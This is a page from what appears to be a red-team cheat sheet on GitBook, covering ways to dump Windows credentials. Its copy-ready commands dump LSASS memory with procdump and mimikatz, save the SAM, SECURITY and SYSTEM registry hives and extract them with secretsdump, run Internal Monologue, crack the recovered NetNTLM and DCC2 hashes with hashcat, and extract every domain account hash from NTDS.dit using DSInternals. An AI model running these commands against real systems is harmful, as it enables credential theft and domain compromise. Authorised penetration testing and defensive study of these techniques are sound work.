๐Ÿ•บ
๐Ÿ•บ
๐Ÿ•บ
๐Ÿ•บ
CheatSheets
Searchโ€ฆ
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By GitBook
Alternate Cred Dumps

Internal Monologue

Internal monologue is a way of dumping creds without touching LSASS.

Using Internal Monologue

execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]

Cracking Returned Hashes

hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force

Procdump + Mimikatz

# Dump with sysinternal windows signed binary
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
โ€‹
# Move lsass.dmp offline and use mimikatz to open and dump passwords
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords
โ€‹
# Viewing dump with invoke-mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'

Reg SAM / Security / System

reg save hklm\system system
reg save hklm\security security
reg save hklm\sam sam
โ€‹
# Extract
python secretsdump.py -security security -system system -sam sam LOCAL
โ€‹
# Cracking MS-Cachev2 hashes recovered
Make the this format:
$DCC2$10240#username#hash
โ€‹
Crack:
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable

Offline DCSync

# For this you need the NTDS.dit file and the SYSTEM registry hive
# You will also need DSInternals PowerShell module. This can be moved across machines.
โ€‹
# Import DSInternals
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1
โ€‹
# Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM
# Extract user information from NTDS.dit
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key
# Extract Hashes from NTDS.dit in a dcsync format
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII
โ€‹
# File can then be cracked, used as normal DCSync would.
Active Directory - Previous
Mimikatz
Next - Active Directory
MSSQL
Last modified 2yr ago
Copy link
On this page
Internal Monologue
Procdump + Mimikatz
Reg SAM / Security / System
Offline DCSync